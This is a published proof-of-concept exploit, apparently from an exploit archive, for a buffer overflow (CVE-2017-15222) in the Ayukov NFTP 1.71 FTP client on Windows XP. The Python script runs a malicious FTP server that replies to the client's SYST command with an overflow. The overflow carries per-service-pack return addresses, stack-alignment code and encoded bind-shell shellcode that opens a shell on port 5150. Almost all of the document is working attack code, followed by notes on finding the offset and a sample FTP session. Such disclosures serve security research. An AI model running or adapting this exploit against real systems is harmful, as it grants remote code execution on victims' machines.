Share
# Exploit Title: Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow  
# Date: 2019-11-03  
# Exploit Author: Chase Hatch (SYANiDE)  
# Vendor Homepage: http://ayukov.com/nftp/  
# Software Link: ftp://ftp.ayukov.com/pub/nftp/nftp-1.71-i386-win32.exe  
# Version: 1.71  
# Tested on: Windows XP Pro SP0, SP1, SP2, SP3  
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2017-15222  
# Steps to reproduce:  
# Run the server with the valid Windows version  
# Connect the client to the malicious server  
# bind shell on port 5150  
  
#!/usr/bin/env python2  
import os, sys, socket  
  
NARGS = len(sys.argv)  
  
# ntdll.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)  
# kernel32.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)  
# 7C923A95 FFD6 CALL ESI # Windows XP Pro SP3; ntdll.dll  
# 7C927543 FFD6 CALL ESI# Windows XP Pro SP2; ntdll.dll  
# 77E641C7 FFE6 JMP ESI# Windows XP Pro SP1; kernel32.dll  
# 77E667F3 FFE6 JMP ESI# Windows XP Pro SP0: kernel32.dll  
tourRETs = {  
"XPProSP3": "\x95\x3A\x92\x7c",  
"XPProSP2": "\x43\x75\x92\x7C",  
"XPProSP1": "\xc7\x41\xe6\x77",  
"XPProSP0": "\xf3\x67\xe6\x77"  
}  
  
  
if not NARGS > 1:  
print("USAGE: %s version" % sys.argv[0])  
print("[.] version must be in:")  
for item in tourRETs:  
print("\t%s" % item)  
sys.exit(1)  
  
  
# sploit = "A"*5000 # crash! in SYST cmd, 41414141 in EIP and EBP  
# ESP and ESI both pointers to somewhere in the As  
# If I increase the overflow string to 10000, the area ESP points to at crash  
#, goes from 864 bytes of uninterrupted \x41's to roughly 4056 bytes.  
# sploit = "A"*10000  
# sploit = sys.argv[1] # $(`locate pattern_create.rb|head -n 1` 10000) # 46326846 in EIP  
# `locate pattern_offset.rb |head -n 1` 46326846 10000 # 4116  
sploit = "A"*4116  
  
# Add the return address  
try:  
sploit += tourRETs[sys.argv[1]]  
except KeyError, x:  
print("[!] Version %s: not a valid version! Possibly bad capitalization" % str(x))  
sys.exit(1)  
  
sploit += ("\x90"*12) # original calcs based on RET*4... oops. realign.  
  
# echo "ibase=16;obase=10;0247CED1 - 0247C834" |bc # 0x69D (1693); ESP-ESI  
sploit += "\x90"*1693 # leaves 16 nops at jmp/call target before Cs  
  
  
# badchars = "\x00\x0a\x0d"  
# locate EIP and align ESP to a close future 4 and 16 byte boundary  
NOTES = """\  
$-37 > D9EE FLDZ  
$-35 > D97424 F4 FSTENV (28-BYTE) PTR SS:[ESP-C]  
$-31 > 59 POP ECX  
$-30 > 80C1 09 ADD CL,9  
$-2D > 80C1 04 ADD CL,4  
$-2A > 80C1 2A ADD CL,2A  
$-27 > 80C5 01 ADD CH,1  
$-24 > 51 PUSH ECX  
$-23 > 5C POP ESP  
"""  
sploit += "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xc1\x09\x80\xc1\x04" #13 bytes  
sploit += "\x80\xc1\x2a\x80\xc5\x01\x51\x5c" # 8 bytes  
sploit += "\x90" * 0x22 # ESP = EIP  
sploit += "\x90" * 20 # sled for shikata_ga_nai unpack  
  
# msfvenom -p windows/shell_bind_tcp LPORT=5150 EXITFUNC=process   
# -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -i 1 -f c  
sploit += (  
"\xba\xd2\xe1\x61\xb1\xdb\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"  
"\x53\x83\xeb\xfc\x31\x53\x0e\x03\x81\xef\x83\x44\xd9\x18\xc1"  
"\xa7\x21\xd9\xa6\x2e\xc4\xe8\xe6\x55\x8d\x5b\xd7\x1e\xc3\x57"  
"\x9c\x73\xf7\xec\xd0\x5b\xf8\x45\x5e\xba\x37\x55\xf3\xfe\x56"  
"\xd5\x0e\xd3\xb8\xe4\xc0\x26\xb9\x21\x3c\xca\xeb\xfa\x4a\x79"  
"\x1b\x8e\x07\x42\x90\xdc\x86\xc2\x45\x94\xa9\xe3\xd8\xae\xf3"  
"\x23\xdb\x63\x88\x6d\xc3\x60\xb5\x24\x78\x52\x41\xb7\xa8\xaa"  
"\xaa\x14\x95\x02\x59\x64\xd2\xa5\x82\x13\x2a\xd6\x3f\x24\xe9"  
"\xa4\x9b\xa1\xe9\x0f\x6f\x11\xd5\xae\xbc\xc4\x9e\xbd\x09\x82"  
"\xf8\xa1\x8c\x47\x73\xdd\x05\x66\x53\x57\x5d\x4d\x77\x33\x05"  
"\xec\x2e\x99\xe8\x11\x30\x42\x54\xb4\x3b\x6f\x81\xc5\x66\xf8"  
"\x66\xe4\x98\xf8\xe0\x7f\xeb\xca\xaf\x2b\x63\x67\x27\xf2\x74"  
"\x88\x12\x42\xea\x77\x9d\xb3\x23\xbc\xc9\xe3\x5b\x15\x72\x68"  
"\x9b\x9a\xa7\x05\x93\x3d\x18\x38\x5e\xfd\xc8\xfc\xf0\x96\x02"  
"\xf3\x2f\x86\x2c\xd9\x58\x2f\xd1\xe2\x72\xae\x5c\x04\x10\xde"  
"\x08\x9e\x8c\x1c\x6f\x17\x2b\x5e\x45\x0f\xdb\x17\x8f\x88\xe4"  
"\xa7\x85\xbe\x72\x2c\xca\x7a\x63\x33\xc7\x2a\xf4\xa4\x9d\xba"  
"\xb7\x55\xa1\x96\x2f\xf5\x30\x7d\xaf\x70\x29\x2a\xf8\xd5\x9f"  
"\x23\x6c\xc8\x86\x9d\x92\x11\x5e\xe5\x16\xce\xa3\xe8\x97\x83"  
"\x98\xce\x87\x5d\x20\x4b\xf3\x31\x77\x05\xad\xf7\x21\xe7\x07"  
"\xae\x9e\xa1\xcf\x37\xed\x71\x89\x37\x38\x04\x75\x89\x95\x51"  
"\x8a\x26\x72\x56\xf3\x5a\xe2\x99\x2e\xdf\x12\xd0\x72\x76\xbb"  
"\xbd\xe7\xca\xa6\x3d\xd2\x09\xdf\xbd\xd6\xf1\x24\xdd\x93\xf4"  
"\x61\x59\x48\x85\xfa\x0c\x6e\x3a\xfa\x04"  
) # 355  
sploit += "C" * (10000 - 4116 - 4 - 12 - 1693 - 13 - 8 - 0x22 - 355 - 20)  
  
  
cases = {  
"USER": "331 user OK. Pass required",  
"PASS": "230 OK, current directory is /",  
# "SYST": "215 UNIX Type: L8",  
  
"SYST": sploit,# CRASH! in response to SYST cmd/request, w/"A"*5000, 41414141 in EIP and EBP  
  
"TYPE": "200 TYPE is whatever was just requested... \"yeah, ok\"",  
"SITE UMASK": "500 SITE UMASK is an unknown extension",  
"CWD": "250 OK, current directory whatever you think it is",  
"PORT": "200 PORT command successful",  
"PASV": "227 Entering PASV mode",  
"LIST": "150 Connecting to whatever port.\r\n226 ASCII\r\n226 Options: -a -l\r\n226 3 matches total"  
}  
  
  
sx = socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
sx.bind(("192.168.56.181",21))  
sx.listen(5)  
print("[.] Standing up HostileFTPd v0.0 alpha, port 21")  
cx,addr = sx.accept()  
print("[!] Connection received from %s" % str(addr))  
cx.send("220 HostileFTPd v0.0 alpha !\r\n")  
notified = 0  
while True:  
req = cx.recv(1024)  
for key, resp in cases.items():  
if key in req:  
cx.send(resp + "\r\n")  
if "SITE UMASK" in req and notified == 0:  
print("[!] Buffer sent. Bind shell on client's port 5150?")  
notified = 1  
if "PASV" in req:  
justpause = raw_input("[.] PASV received. Pausing recv buffer")  
  
  
NOTES="""\  
### followed TCP stream in normal client connect to ftp server  
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------  
220-You are user number 1 of 50 allowed.  
220-Local time is now 13:47. Server port: 21.  
220-This is a private system - No anonymous login  
220-IPv6 connections are also welcome on this server.  
220 You will be disconnected after 15 minutes of inactivity.  
USER bozo  
331 User bozo OK. Password required  
PASS theclown  
230-User bozo has group access to: 1003   
230 OK. Current directory is /  
SYST  
215 UNIX Type: L8  
TYPE I  
200 TYPE is now 8-bit binary  
SITE UMASK 022  
500 SITE UMASK is an unknown extension  
CWD /  
250 OK. Current directory is /  
PASV  
227 Entering Passive Mode (192,168,56,181,183,29)  
LIST -a  
150 Accepted data connection  
226-ASCII  
226-Options: -a -l   
226 3 matches total  
"""